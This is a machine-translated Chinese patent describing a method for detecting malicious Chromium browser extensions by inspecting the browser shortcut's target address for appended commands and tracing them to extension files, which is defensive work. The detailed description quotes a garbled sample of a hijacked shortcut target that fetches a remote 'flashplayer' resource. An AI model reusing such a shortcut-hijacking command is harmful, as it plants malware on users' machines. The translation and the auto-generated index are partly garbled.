CN117077138B - Anomaly detection method, system, medium and equipment based on browser - Google Patents
Anomaly detection method, system, medium and equipment based on browser Download PDFInfo
- Publication number
- CN117077138B CN117077138B CN202311056058.3A CN202311056058A CN117077138B CN 117077138 B CN117077138 B CN 117077138B CN 202311056058 A CN202311056058 A CN 202311056058A CN 117077138 B CN117077138 B CN 117077138B
- Authority
- CN
- China
- Prior art keywords
- character string
- browser
- target
- abnormal
- extension program
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
- 238000001514 detection method Methods 0.000 title claims abstract description 45
- 230000002159 abnormal effect Effects 0.000 claims abstract description 65
- 238000000034 method Methods 0.000 claims abstract description 59
- 230000005856 abnormality Effects 0.000 claims abstract description 49
- 238000012545 processing Methods 0.000 claims abstract description 13
- 239000013598 vector Substances 0.000 claims description 33
- 230000006399 behavior Effects 0.000 claims description 25
- VYZAMTAEIAYCRO-UHFFFAOYSA-N Chromium Chemical compound [Cr] VYZAMTAEIAYCRO-UHFFFAOYSA-N 0.000 claims description 19
- 206010000117 Abnormal behaviour Diseases 0.000 claims description 17
- 229910052804 chromium Inorganic materials 0.000 claims description 14
- 239000011651 chromium Substances 0.000 claims description 14
- 230000006870 function Effects 0.000 claims description 13
- 238000004590 computer program Methods 0.000 claims description 7
- 244000035744 Hura crepitans Species 0.000 claims description 6
- 230000003068 static effect Effects 0.000 claims description 5
- 108091026890 Coding region Proteins 0.000 claims description 3
- 241000700605 Viruses Species 0.000 description 15
- 238000013507 mapping Methods 0.000 description 5
- 238000004891 communication Methods 0.000 description 4
- 238000009434 installation Methods 0.000 description 3
- 230000003287 optical effect Effects 0.000 description 3
- 239000013307 optical fiber Substances 0.000 description 2
- 230000000644 propagated effect Effects 0.000 description 2
- 238000003491 array Methods 0.000 description 1
- 230000009286 beneficial effect Effects 0.000 description 1
- 230000005540 biological transmission Effects 0.000 description 1
- 238000010586 diagram Methods 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 238000003062 neural network model Methods 0.000 description 1
- 230000002093 peripheral effect Effects 0.000 description 1
- 238000011160 research Methods 0.000 description 1
- 238000005070 sampling Methods 0.000 description 1
- 239000004065 semiconductor Substances 0.000 description 1
- 238000006467 substitution reaction Methods 0.000 description 1
- 230000002123 temporal effect Effects 0.000 description 1
- 238000012549 training Methods 0.000 description 1
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F16/00—Information retrieval; Database structures therefor; File system structures therefor
- G06F16/90—Details of database functions independent of the retrieved data types
- G06F16/903—Querying
- G06F16/90335—Query processing
- G06F16/90344—Query processing by using string matching techniques
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F16/00—Information retrieval; Database structures therefor; File system structures therefor
- G06F16/90—Details of database functions independent of the retrieved data types
- G06F16/95—Retrieval from the web
- G06F16/955—Retrieval from the web using information identifiers, e.g. uniform resource locators [URL]
- G06F16/9558—Details of hyperlinks; Management of linked annotations
Landscapes
- Engineering & Computer Science (AREA)
- Theoretical Computer Science (AREA)
- General Engineering & Computer Science (AREA)
- Databases & Information Systems (AREA)
- General Physics & Mathematics (AREA)
- Physics & Mathematics (AREA)
- Computer Security & Cryptography (AREA)
- Software Systems (AREA)
- Computer Hardware Design (AREA)
- Data Mining & Analysis (AREA)
- General Health & Medical Sciences (AREA)
- Virology (AREA)
- Health & Medical Sciences (AREA)
- Computational Linguistics (AREA)
- Debugging And Monitoring (AREA)
Abstract
The present invention relates to the field of network security detection, and in particular, to a browser-based anomaly detection method, system, medium, and device. The method comprises the following steps: obtaining a target address linked with a shortcut file of a browser to be tested; acquiring a target character string; if other character strings exist in the target character string besides the preset character string, taking the other character strings as abnormal judgment character strings; and carrying out abnormality positioning processing on the plurality of expansion programs according to the abnormality judgment character string, and determining the abnormal expansion program. According to the invention, by matching the character strings included in the target address, whether the abnormal extension program exists in the browser to be tested or not can be rapidly determined, and whether the browser to be tested is infected or not is attacked. And the abnormal extension program is accurately positioned so as to be cleared in time.
Description
Technical Field
The present invention relates to the field of network security detection, and in particular, to a browser-based anomaly detection method, system, medium, and device.
Background
In the field of computer security, malware detection techniques refer to various techniques for detecting malware in a computer system. The detection method for the browser malicious extension program is also an important research direction in the field. A browser malicious extension refers to a type of software that infects a user's computer in the form of a browser plug-in or extension, thereby performing various malicious acts.
Currently, detection of malicious extensions to a browser also faces a series of technical challenges. For example, the malicious extension program may be hidden in a plug-in or an extension program list of the Chromium browser, and when the Chromium browser starts the corresponding plug-in, the malicious extension program is activated, so as to develop a corresponding attack behavior. Typically, in order to increase the concealment of the malicious extension program, the code corresponding to the malicious program is smaller, and typically some instructions for modifying the command for the chrome browser launch, such as instructions for adding a malicious resource download link to the chrome browser launch directory. Then, the downloaded malicious resources can be used for utilizing loopholes or security loopholes of the browser to attack and infect the user computer.
Because the hidden position of the malicious extension program is hidden, and the operation executed by the malicious extension program is more hidden and finer, the malicious extension program in the form is difficult to be found by a user and is difficult to be cleared in time.
Disclosure of Invention
Aiming at the technical problems that the hiding position of the malicious extension program is hidden, and meanwhile, the operation executed by the malicious extension program is more hidden and finer, so that the malicious extension program in the form is difficult to discover by a user and is difficult to clear in time, the invention adopts the following technical scheme:
According to one aspect of the present invention, there is provided a browser-based anomaly detection method, the method comprising the steps of:
obtaining a target address linked with a shortcut file of a browser to be tested; the browser to be tested is a browser developed based on a Chromium browser, and a plurality of extension programs are installed in the browser to be tested;
acquiring a target character string, wherein the target character string is a character string after the last preset separator in a target address;
if other character strings exist in the target character string besides the preset character string, taking the other character strings as abnormal judgment character strings;
and carrying out abnormality positioning processing on the plurality of expansion programs according to the abnormality judgment character string, and determining the abnormal expansion program.
The abnormality judgment character string is a character string corresponding to the resource downloading instruction;
exception location processing, comprising:
acquiring a resource file of each extension program; the resource file comprises a main function file and a sub function file which correspond to the extension program;
respectively matching the abnormality judgment character strings with the character strings in the resource files of each extension program;
if the matching is successful, determining that the extension program corresponding to the resource file which is successfully matched is an abnormal extension program;
After determining the exception extension program, the method further comprises:
the abnormal extension program is put into a sandbox to run again, and the corresponding resource information when the resource is downloaded in the running process is obtained;
according to the resource information, carrying out anomaly detection on the target terminal; the target terminal is a terminal provided with a browser to be tested.
Further, after obtaining the target address linked with the shortcut file of the browser to be tested, the method further comprises:
if only the preset character string exists in the target character string, sequentially carrying out static detection and dynamic detection on the security holes by each extension program to generate a security detection result of each extension program;
and determining the abnormal extension program according to the safety detection result of each extension program.
Further, obtaining the target address linked with the shortcut file of the browser to be tested includes:
decoding a to-be-detected browser shortcut file to generate hexadecimal file codes corresponding to the to-be-detected browser shortcut file;
and obtaining the target address from a preset coding region in hexadecimal file coding.
Further, before taking the other character strings as the abnormality judgment character string if the target character string has other character strings in addition to the preset character string, the method further comprises:
Acquiring a character string after the last preset segmenter in the target address as a target character string;
acquiring total number K of characters in target character string 1 ;
Acquiring the total number A of characters contained in each preset character string 1 、A 2 、…、A i 、…、A z The method comprises the steps of carrying out a first treatment on the surface of the Wherein A is i The total number of characters contained in the ith preset character string is Z, and i=1, 2, … and Z are the total number of the preset character strings;
if Max (A) 1 、A 2 、…、A i 、…、A z )≤K 1 And comparing each preset character string with the target character string.
Further, after determining the exception extension program, the method further includes:
acquiring a plurality of acquisition terminals; each acquisition terminal is respectively provided with an acquisition browser developed based on a Chromium browser, and one acquisition browser only comprises an abnormal extension program;
acquiring a port state vector and a port behavior set acquired by each acquisition terminal; wherein B is j For the port state vector acquired by the jth acquisition terminal, B j =(B j 1 、B j 2 、…、B j n 、…、B j y ),B j n The state value of the nth port in the jth acquisition terminal is given, y is the number of ports in each acquisition terminal, and n=1, 2, … and y; wherein C is j C, for the port behavior set acquired by the j-th acquisition terminal j =(C j 1 、C j 2 、…、C j n 、…、C j y ),C j n C is the behavior feature vector corresponding to the nth port in the jth acquisition terminal j n =(C j n1 、C j n2 、…、C j nm 、…、C j nx ) The method comprises the steps of carrying out a first treatment on the surface of the Wherein C is j nm The method comprises the steps that the number of the m-th preset instruction type instructions appears in one abnormal behavior acquired by an n-th port in a j-th acquisition terminal; x is the total number of preset instruction types, m=1, 2, …, x;
clustering all port state vectors to generate a plurality of cluster groups;
obtaining a center vector corresponding to each cluster group;
port behavior sets corresponding to all port state vectors included in each cluster group are respectively added into corresponding feature sets, and abnormal behavior feature sets corresponding to each cluster group are generated;
and generating a judging sample set corresponding to each abnormal expansion program according to the central vector and the abnormal behavior characteristic set corresponding to each cluster group.
Further, obtaining the port state vector collected by each collection terminal includes:
acquiring a state value of each port of an acquisition terminal in one acquisition period; the acquisition period is a period corresponding to the completion of one abnormal behavior of the abnormal extension program;
if the port is in an opened state in one acquisition period, configuring a first state value for the port;
if the port is always in the closed state in one acquisition period, a second state value is configured for the port.
According to a second aspect of the present invention, there is provided a browser-based abnormality detection apparatus, the apparatus comprising:
the address acquisition module is used for acquiring a target address linked with the shortcut file of the browser to be tested; the browser to be tested is a browser developed based on a Chromium browser, and a plurality of extension programs are installed in the browser to be tested;
character acquisition module: the method comprises the steps of obtaining a target character string, wherein the target character string is a character string after the last preset separator in a target address;
the abnormality judging module is used for taking other character strings as abnormality judging character strings if other character strings exist in the target character strings except the preset character strings;
the abnormality positioning module is used for performing abnormality positioning processing on the plurality of extension programs according to the abnormality judgment character string to determine an abnormal extension program;
the abnormality judgment character string is a character string corresponding to the resource downloading instruction;
the exception positioning process comprises the following steps:
acquiring a resource file of each extension program; the resource file comprises a main function file and a sub function file which correspond to the extension program;
matching the abnormality judgment character strings with the character strings in the resource files of the expansion programs respectively;
If the matching is successful, determining that the extension program corresponding to the resource file which is successfully matched is an abnormal extension program;
after determining the exception extension procedure, the method further comprises:
the abnormal extension program is put into a sandbox to run again, and resource information corresponding to the process of downloading resources in the running process is obtained;
according to the resource information, performing anomaly detection on the target terminal; the target terminal is a terminal provided with the browser to be tested.
According to a third aspect of the present invention, there is provided a non-transitory computer-readable storage medium storing a computer program which, when executed by a processor, implements a browser-based anomaly detection method as described above.
According to a fourth aspect of the present invention, there is provided an electronic device comprising a memory, a processor and a computer program stored in the memory and executable on the processor, the processor implementing a browser-based anomaly detection method as described above when executing the computer program.
The invention has at least the following beneficial effects:
the abnormal extension program generally modifies a starting instruction of the to-be-tested browser to add a corresponding malicious instruction, so that a target address linked with a shortcut file (lnk file) of the to-be-tested browser is changed, specifically, the malicious instruction is added into an original target address, and when the shortcut file is opened each time, the to-be-tested browser can be opened, and meanwhile, the corresponding malicious instruction can be executed. According to the invention, by matching the character strings included in the target address, whether the abnormal extension program exists in the browser to be tested or not can be rapidly determined, and whether the abnormal extension program is already infected and attacked or not can be rapidly determined.
In addition, since the original normal extension program is inserted with the corresponding instruction for modifying the target address linked to the lnk file, the content corresponding to the abnormality judgment character string must exist in the resource file of the abnormal extension program, and according to the feature, by the abnormality locating processing in the present invention, it is possible to quickly determine which extension program (plug-in) is the abnormal extension program. According to the technical scheme, whether the abnormal extension program exists in the browser to be tested or not can be rapidly determined, and the abnormal extension program is accurately positioned so as to be conveniently cleared in time.
Drawings
In order to more clearly illustrate the technical solutions of the embodiments of the present invention, the drawings required for the description of the embodiments will be briefly described below, and it is apparent that the drawings in the following description are only some embodiments of the present invention, and other drawings may be obtained according to these drawings without inventive effort for a person skilled in the art.
FIG. 1 is a flowchart of a browser-based anomaly detection method according to an embodiment of the present invention;
fig. 2 is a block diagram of an abnormality detection apparatus based on a browser according to another embodiment of the present invention.
Detailed Description
The following description of the embodiments of the present invention will be made clearly and completely with reference to the accompanying drawings, in which it is apparent that the embodiments described are only some embodiments of the present invention, but not all embodiments. All other embodiments, which can be made by those skilled in the art based on the embodiments of the invention without making any inventive effort, are intended to fall within the scope of the invention.
According to a first aspect of the present invention, as shown in fig. 1, there is provided a browser-based abnormality detection method for determining an abnormality extension program, the method comprising the steps of:
step 100: and obtaining the target address linked with the shortcut file of the browser to be tested.
The browser to be tested is a browser developed based on a chrome browser, and a plurality of extension programs are installed in the browser to be tested.
The currently found viruses are deployed in plug-ins (extension programs) corresponding to the Chromium browser, and the Ink files corresponding to the Chromium browser are modified. Therefore, the technical scheme corresponding to the embodiment can be applied to any browser developed based on the prior Chromium browser kernel. That is, the browser to be tested may be an existing Opera browser, an edge browser, or a *** browser.
Further, step 100 includes:
step 101: and decoding the browser shortcut file to be detected by using a hexadecimal editor, and generating hexadecimal file codes corresponding to the browser shortcut file to be detected.
Specifically, the hexadecimal Editor in this embodiment may be a 010Editor.
Step 102: and obtaining the target address from a preset coding region in hexadecimal file coding.
After the 010Editor is used for opening the corresponding lnk file, a corresponding hexadecimal file code is generated and divided into a plurality of sections, and different contents in the lnk file correspond to hexadecimal codes in different sections. Specifically, the target address in the lnk file corresponds to hexadecimal encoding in the second section. Thus, the character string corresponding to the target address can be read through hexadecimal encoding in the second section. The second section is a second divided coding section in hexadecimal file codes corresponding to the lnk file generated by the 010Editor. Naturally, if other hexadecimal editors are used, a hexadecimal coding section corresponding to the target address in the lnk file needs to be found correspondingly.
Step 200: and acquiring a target character string, wherein the target character string is the character string after the last preset separator in the target address.
Such as: and (C) \program Files (x 86) \Microsoft\edge\application\msedge.exe "is the target character string.
In one aspect, after step 200, the method further comprises:
step 300: if other character strings exist in the target character string besides the preset character string, the other character strings are used as the abnormality judgment character strings.
The character string corresponding to the normal target address is composed of a storage directory of the starting file and a starting file name, such as' C \program Files (x 86) \Microsoft\edge\application\msedge. When the target address is maliciously modified, the target address is changed into a form that a corresponding instruction is added after the original target address, such as' C \program File step (x 86) \Microsoft\edge\application\msedge.
The above features can show that the difference between the target address before and after malicious tampering is only that the character strings after the last preset separator are different, i.e. the target character strings are different. In addition, the starting file names corresponding to the existing browser developed based on the chrome browser kernel can be determined in advance, so that the preset character strings can be collected according to the starting file names of the existing target browser. If the starting file name corresponding to the Opera browser is the name of the launcher; the corresponding starting file name of the edge browser is msedge.exe; the name of the start file corresponding to the *** browser is chrome. After all the preset strings are collected, they can be used to make the abnormality determination in step 300.
Further, before step 300, the method further includes:
step 301: and acquiring a character string after the last preset segmenter in the target address as a target character string.
Step 303: acquiring total number K of characters in target character string 1 。
Step 303: acquiring the total number A of characters contained in each preset character string 1 、A 2 、…、A i 、…、A z Wherein A is i For the total number of characters contained in the ith preset character string, z is the total number of preset character strings, i=1, 2, …,Z。
Step 304: if Max (A) 1 、A 2 、…、A i 、…、A z )≤K 1 And comparing each preset character string with the target character string.
Specifically, the comparison is carried out according to the following steps:
step 314: and determining a target matching interval in the target character string. The length of the target matching interval is the same as the length of the corresponding preset character string, and the initial position of the target matching interval is the first character in the target character string.
Step 324: and comparing the preset character string with the character string in the corresponding target matching interval.
Typically, when the target address is maliciously modified, it will be in the form of adding a corresponding instruction after the original target address, such as "C \windows\system 32\msedge/exe/V/Csetx 4OAGWfxlEs02z6 nnukk=2whttpr 0& setL1U03Hm UO6B9 icurrcnnlo 4=. Com =. Com &/br/flashplayer/". Since the number of characters included in the added instruction is typically much larger than the number of characters in the start file name, a preliminary anomaly determination may be performed based on the comparison of the number of characters from steps 301-304 to quickly determine the modified destination address before proceeding to step 300.
On the other hand, after step 200, the method further comprises:
step 310: if only the preset character string exists in the target character string, carrying out static detection and dynamic detection on the security holes by each extension program in sequence, and generating a security detection result of each extension program.
Step 320: and determining the abnormal extension program according to the safety detection result of each extension program.
In the scheme, if the target address is not tampered maliciously, the security detection can be sequentially carried out on the extension program through the static detection and the dynamic detection of the existing security holes, and whether the extension program is infected by viruses can be more accurately determined.
Step 400: and carrying out abnormality positioning processing on the plurality of expansion programs according to the abnormality judgment character string, and determining the abnormal expansion program.
Exception location processing, comprising:
step 401: and acquiring a resource file of each extension program. The resource file comprises a main function file and a sub function file corresponding to the extension program.
Specifically, after the developer mode of the browser to be tested is opened, the file ID of the installation file of each plug-in (extension program) already installed in the browser to be tested can be obtained. Therefore, the installation file of each plug-in can be searched in the corresponding terminal through the file ID, and the installation file comprises the corresponding resource file, wherein the main function file is a file with the suffix of json; the subfunction file is a file with a suffix of. Js.
Step 402: and respectively matching the abnormality judgment character strings with the character strings in the resource files of each extension program.
Step 403: if the matching is successful, determining that the extension program corresponding to the resource file which is successfully matched is an abnormal extension program.
Because the abnormal extension program is an original normal extension program, a corresponding instruction for modifying the target address linked with the lnk file is inserted, and the modification instruction necessarily includes added content, such as a character string corresponding to the downloading instruction. Therefore, the content corresponding to the abnormality judgment character string is necessarily present in the resource file of the abnormal extension program, and according to the characteristics, by the abnormality locating processing in the present invention, it can be quickly determined which extension program (plug-in) is the abnormal extension program. According to the technical scheme, whether the abnormal extension program exists in the browser to be tested or not can be rapidly determined, and the abnormal extension program is accurately positioned so as to be conveniently cleared in time.
As another possible embodiment of the present invention, the abnormality determination string is a string corresponding to a resource download instruction.
After determining the exception extension procedure, the method further comprises:
Step 500: and (3) putting the abnormal extension program into a sandbox to run again, and acquiring corresponding resource information when downloading resources in the running process.
Step 600: and detecting the abnormality of the target terminal according to the resource information. The target terminal is a terminal provided with a browser to be tested.
If the abnormality judgment character string is a character string corresponding to the resource downloading instruction, the resource downloading instruction is executed simultaneously when the browser to be tested is started, and the corresponding virus is downloaded from the corresponding IP address. Therefore, by putting the abnormal extension program into the sandbox to run again, the data packet when the corresponding virus is downloaded can be obtained in the running process, and further more resource information such as the contents of the destination IP, the communication port number, the communication protocol, the virus code and the like can be obtained. The existing virus feature library can be updated according to the information, and meanwhile, other target terminals can be subjected to abnormality detection according to the features.
Because the virus file causing the abnormal behavior in the invention is downloaded by the abnormal extension program in the Chromium browser, the attack mode is hidden and unusual, and the prior art lacks the judging feature for the attack behavior, so that the attack behavior is not convenient to judge more timely and accurately. As another possible embodiment of the present invention, after determining the abnormal extension program, the method further includes:
Step 410: a plurality of acquisition terminals are acquired. Each acquisition terminal is respectively provided with an acquisition browser developed based on a Chromium browser, and one acquisition browser only comprises an abnormal extension program. Each acquisition terminal is configured with a port information acquisition instruction for acquiring port state information and port received instruction information.
Specifically, in order to ensure the comprehensiveness of the finally obtained abnormal behavior characteristics, when the acquisition terminal is set, a plurality of acquisition browsers can be obtained, a plurality of known abnormal extension programs are covered in the plurality of acquisition browsers, and the plurality of acquisition browsers with the same abnormal extension program are respectively deployed on different acquisition terminals, so that the behavior characteristics of different abnormal extension programs can be acquired, and the behavior characteristics of each abnormal extension program in different acquisition browsers can also be all acquired.
Step 420: and acquiring a port state vector and a port behavior set acquired by each acquisition terminal. Wherein B is j For the port state vector acquired by the jth acquisition terminal, B j =(B j 1 、B j 2 、…、B j n 、…、B j y ),B j n And y is the number of ports in each acquisition terminal, and n=1, 2, … and y. Wherein C is j C, for the port behavior set acquired by the j-th acquisition terminal j =(C j 1 、C j 2 、…、C j n 、…、C j y ),C j n And the behavior feature vector corresponding to the nth port in the jth acquisition terminal. C (C) j n =(C j n1 、C j n2 、…、C j nm 、…、C j nx ) Wherein C j nm For the number of the m preset instruction types in the abnormal behavior acquired by the nth port in the jth acquisition terminal, x is the total number of the preset instruction types, and m=1, 2, … and x.
Specifically, obtaining the port state vector collected by each collection terminal includes:
step 421: and acquiring the state value of each port in one acquisition period by using the port information acquisition instruction. The acquisition period is a period corresponding to the abnormal behavior of the abnormal extension program.
Specifically, the existing security analysis software may be used to determine each corresponding acquisition period according to the acquired port information. And each corresponding acquisition period can be determined manually according to the acquired port information.
Step 422: if the port is in an open state in one acquisition period, a first state value is configured for the port.
Step 423: if the port is always in the closed state in one acquisition period, a second state value is configured for the port.
Specifically, the first state value may be set to 0 and the second state value may be set to 1. If 50 ports are shared in the acquisition terminal as ports to be monitored in the embodiment, the final port state vector is a one-dimensional vector with 50 dimensions, and the elements in the vector are only 1 or 0.
Specifically, acquiring a port behavior set acquired by each acquisition terminal includes:
step 424: and acquiring instruction information sent by the target IP address received by each port in one acquisition period by using the port information acquisition instruction.
When the infected terminal is attacked (such as when related data is stolen), the malicious terminal corresponding to the target IP address can communicate for a plurality of times, so that transmission instructions of the data or other instructions can be issued. Therefore, in the process of executing each abnormal behavior, the corresponding port on the acquisition terminal receives the responsive instruction information.
Step 425: and determining the preset instruction type corresponding to each instruction according to the instruction information.
Further, step 425 includes:
step 4251: and obtaining an instruction mapping table, wherein the instruction mapping table comprises a corresponding relation between each preset instruction type and an instruction keyword.
Specifically, the keywords corresponding to each instruction can be extracted according to the collected data of each abnormal extension program in the actual scene, so that the corresponding instruction mapping table can be obtained.
Step 4252: and acquiring a preset instruction type corresponding to each instruction according to the instruction information and the instruction mapping table.
Step 426: and determining the occurrence times of each preset instruction type according to all acquired instruction information.
According to the instruction mapping table, statistics can be performed on the times of obtaining each preset instruction type in one sampling period for each port. And further forming a behavior feature vector corresponding to the port. If the preset instruction types are 10, the behavior feature vector corresponding to each port is a one-dimensional vector with 10 dimensions. Each element of the plurality of elements is a natural number representing the number of occurrences of the corresponding type of instruction.
Step 430: clustering all port state vectors to generate a plurality of cluster groups.
Specifically, the clustering can be performed by using a K-Mean step clustering algorithm, and the number of configured cluster groups is the same as the number of types of abnormal expansion programs included in the acquisition terminal.
Step 440: and obtaining a center vector corresponding to each cluster group.
Step 450: and respectively adding port behavior sets corresponding to all the port state vectors included in each cluster group into the corresponding feature set to generate an abnormal behavior feature set corresponding to each cluster group.
Step 460: and generating a judging feature set corresponding to each abnormal expansion program according to the central vector and the abnormal behavior feature set corresponding to each cluster group.
In this embodiment, since each of the exception extension programs is performing an exception action, the ports on which it is necessary to perform communication are substantially the same. Thus, the function of clustering each of the abnormal extension programs can be realized by clustering the port state vectors. Meanwhile, after the same abnormal extension program is deployed in different acquisition browsers, certain differences may exist in the executed operation behaviors when the abnormal behaviors are performed. Therefore, the port behavior sets corresponding to the same abnormal extension program also have a certain difference. Therefore, port behavior sets corresponding to all port state vectors included in each cluster group are respectively added into the corresponding feature sets, so that the finally generated abnormal behavior feature sets corresponding to each abnormal extension program can be ensured to cover each type of operation behaviors more comprehensively, and the accuracy of judging the feature sets is further improved.
Further, step 460 includes:
step 461: and obtaining an exception label of the exception extension program.
Specifically, the virus name corresponding to the exception extension program may be used as the corresponding exception tag.
Step 462: and combining the central vector of the cluster group corresponding to the abnormal expansion program with each port behavior set in the cluster group corresponding to the abnormal expansion program to form a plurality of primary judgment features corresponding to the abnormal expansion program.
Step 463: the anomaly tags are used as decision tags for each primary decision feature.
After the processing from step 461 to step 463, a plurality of virus decision features corresponding to the same virus attack are generated. Thus, a large number of virus determination characteristics of viruses corresponding to each abnormal extension program can be generated by this processing. The virus judging feature can be used for training the existing neural network model to generate a model with virus judging capability, so that the virus judging work can be more quickly and efficiently carried out in the later period.
According to a second aspect of the present invention, as shown in fig. 2, there is also provided a browser-based abnormality detection apparatus including:
the address acquisition module is used for acquiring a target address linked with the shortcut file of the browser to be tested; the browser to be tested is a browser developed based on a Chromium browser, and a plurality of extension programs are installed in the browser to be tested;
Character acquisition module: the method comprises the steps of obtaining a target character string, wherein the target character string is a character string after the last preset separator in a target address;
the abnormality judging module is used for taking other character strings as abnormality judging character strings if other character strings exist in the target character strings except the preset character strings;
and the abnormality positioning module is used for performing abnormality positioning processing on the plurality of extension programs according to the abnormality judgment character string to determine the abnormal extension program.
Furthermore, although the steps of the methods in the present disclosure are depicted in a particular order in the drawings, this does not require or imply that the steps must be performed in that particular order or that all illustrated steps be performed in order to achieve desirable results. Additionally or alternatively, certain steps may be omitted, multiple steps combined into one step to perform, and/or one step decomposed into multiple steps to perform, etc.
From the above description of embodiments, those skilled in the art will readily appreciate that the example embodiments described herein may be implemented in software, or may be implemented in software in combination with the necessary hardware. Thus, the technical solution according to the embodiments of the present disclosure may be embodied in the form of a software product, which may be stored in a non-volatile storage medium (may be a CD-ROM, a U-disk, a mobile hard disk, etc.) or on a network, including several instructions to cause a computing device (may be a personal computer, a server, a mobile terminal, or a network device, etc.) to perform the method according to the embodiments of the present disclosure.
In an exemplary embodiment of the present disclosure, an electronic device capable of implementing the above method is also provided.
Those skilled in the art will appreciate that the various aspects of the invention may be implemented as a system, method, or program product. Accordingly, aspects of the invention may be embodied in the following forms, namely: an entirely hardware embodiment, an entirely software embodiment (including firmware, micro-code, etc.) or an embodiment combining hardware and software aspects may be referred to herein as a "circuit," module "or" system.
An electronic device according to this embodiment of the invention. The electronic device is merely an example, and should not impose any limitations on the functionality and scope of use of embodiments of the present invention.
The electronic device is in the form of a general purpose computing device. Components of an electronic device may include, but are not limited to: the at least one processor, the at least one memory, and a bus connecting the various system components, including the memory and the processor.
Wherein the memory stores program code that is executable by the processor to cause the processor to perform steps according to various exemplary embodiments of the present invention described in the above section of the exemplary method of this specification.
The storage may include readable media in the form of volatile storage, such as Random Access Memory (RAM) and/or cache memory, and may further include Read Only Memory (ROM).
The storage may also include a program/utility having a set (at least one) of program modules including, but not limited to: an operating system, one or more application programs, other program modules, and program data, each or some combination of which may include an implementation of a network environment.
The bus may be one or more of several types of bus structures including a memory bus or memory controller, a peripheral bus, an accelerated graphics port, a processor, or a local bus using any of a variety of bus architectures.
The electronic device may also communicate with one or more external devices (e.g., keyboard, pointing device, bluetooth device, etc.), with one or more devices that enable a user to interact with the electronic device, and/or with any device (e.g., router, modem, etc.) that enables the electronic device to communicate with one or more other computing devices. Such communication may be through an input/output (I/O) interface. And, the electronic device may also communicate with one or more networks such as a Local Area Network (LAN), a Wide Area Network (WAN), and/or a public network, such as the Internet, through a network adapter. The network adapter communicates with other modules of the electronic device via a bus. It should be appreciated that although not shown, other hardware and/or software modules may be used in connection with an electronic device, including but not limited to: microcode, device drivers, redundant processors, external disk drive arrays, RAID systems, tape drives, data backup storage systems, and the like.
From the above description of embodiments, those skilled in the art will readily appreciate that the example embodiments described herein may be implemented in software, or may be implemented in software in combination with the necessary hardware. Thus, the technical solution according to the embodiments of the present disclosure may be embodied in the form of a software product, which may be stored in a non-volatile storage medium (may be a CD-ROM, a U-disk, a mobile hard disk, etc.) or on a network, including several instructions to cause a computing device (may be a personal computer, a server, a terminal device, or a network device, etc.) to perform the method according to the embodiments of the present disclosure.
In an exemplary embodiment of the present disclosure, a computer-readable storage medium having stored thereon a program product capable of implementing the method described above in the present specification is also provided. In some possible embodiments, the aspects of the invention may also be implemented in the form of a program product comprising program code for causing a terminal device to carry out the steps according to the various exemplary embodiments of the invention as described in the "exemplary method" section of this specification, when the program product is run on the terminal device.
The program product may employ any combination of one or more readable media. The readable medium may be a readable signal medium or a readable storage medium. The readable storage medium can be, for example, but is not limited to, an electronic, magnetic, optical, electromagnetic, infrared, or semiconductor system, apparatus, or device, or a combination of any of the foregoing. More specific examples (a non-exhaustive list) of the readable storage medium would include the following: an electrical connection having one or more wires, a portable disk, a hard disk, random Access Memory (RAM), read-only memory (ROM), erasable programmable read-only memory (EPROM or flash memory), optical fiber, portable compact disk read-only memory (CD-ROM), an optical storage device, a magnetic storage device, or any suitable combination of the foregoing.
The computer readable signal medium may include a data signal propagated in baseband or as part of a carrier wave with readable program code embodied therein. Such a propagated data signal may take any of a variety of forms, including, but not limited to, electro-magnetic, optical, or any suitable combination of the foregoing. A readable signal medium may also be any readable medium that is not a readable storage medium and that can communicate, propagate, or transport a program for use by or in connection with an instruction execution system, apparatus, or device.
Program code embodied on a readable medium may be transmitted using any appropriate medium, including but not limited to wireless, wireline, optical fiber cable, RF, etc., or any suitable combination of the foregoing.
Program code for carrying out operations of the present invention may be written in any combination of one or more programming languages, including an object oriented programming language such as Java, C++ or the like and conventional procedural programming languages, such as the "C" programming language or similar programming languages. The program code may execute entirely on the user's computing device, partly on the user's device, as a stand-alone software package, partly on the user's computing device, partly on a remote computing device, or entirely on the remote computing device or server. In the case of remote computing devices, the remote computing device may be connected to the user computing device through any kind of network, including a Local Area Network (LAN) or a Wide Area Network (WAN), or may be connected to an external computing device (e.g., connected via the Internet using an Internet service provider).
Furthermore, the above-described drawings are only schematic illustrations of processes included in the method according to the exemplary embodiment of the present invention, and are not intended to be limiting. It will be readily appreciated that the processes shown in the above figures do not indicate or limit the temporal order of these processes. In addition, it is also readily understood that these processes may be performed synchronously or asynchronously, for example, among a plurality of modules.
It should be noted that although in the above detailed description several modules or units of a device for action execution are mentioned, such a division is not mandatory. Indeed, the features and functionality of two or more modules or units described above may be embodied in one module or unit in accordance with embodiments of the present disclosure. Conversely, the features and functions of one module or unit described above may be further divided into a plurality of modules or units to be embodied.
The present invention is not limited to the above embodiments, and any changes or substitutions that can be easily understood by those skilled in the art within the technical scope of the present invention are intended to be included in the scope of the present invention. Therefore, the protection scope of the invention is subject to the protection scope of the claims.
Claims (9)
1. An anomaly detection method based on a browser is characterized by comprising the following steps:
obtaining a target address linked with a shortcut file of a browser to be tested; the browser to be tested is a browser developed based on a Chromium browser, and a plurality of extension programs are installed in the browser to be tested;
Acquiring a target character string, wherein the target character string is a character string after the last preset separator in a target address;
if other character strings exist in the target character string besides the preset character string, the other character strings are used as abnormal judgment character strings;
performing abnormality positioning processing on a plurality of expansion programs according to the abnormality judgment character string, and determining an abnormal expansion program;
the abnormality judgment character string is a character string corresponding to the resource downloading instruction;
the exception positioning process comprises the following steps:
acquiring a resource file of each extension program; the resource file comprises a main function file and a sub function file which correspond to the extension program;
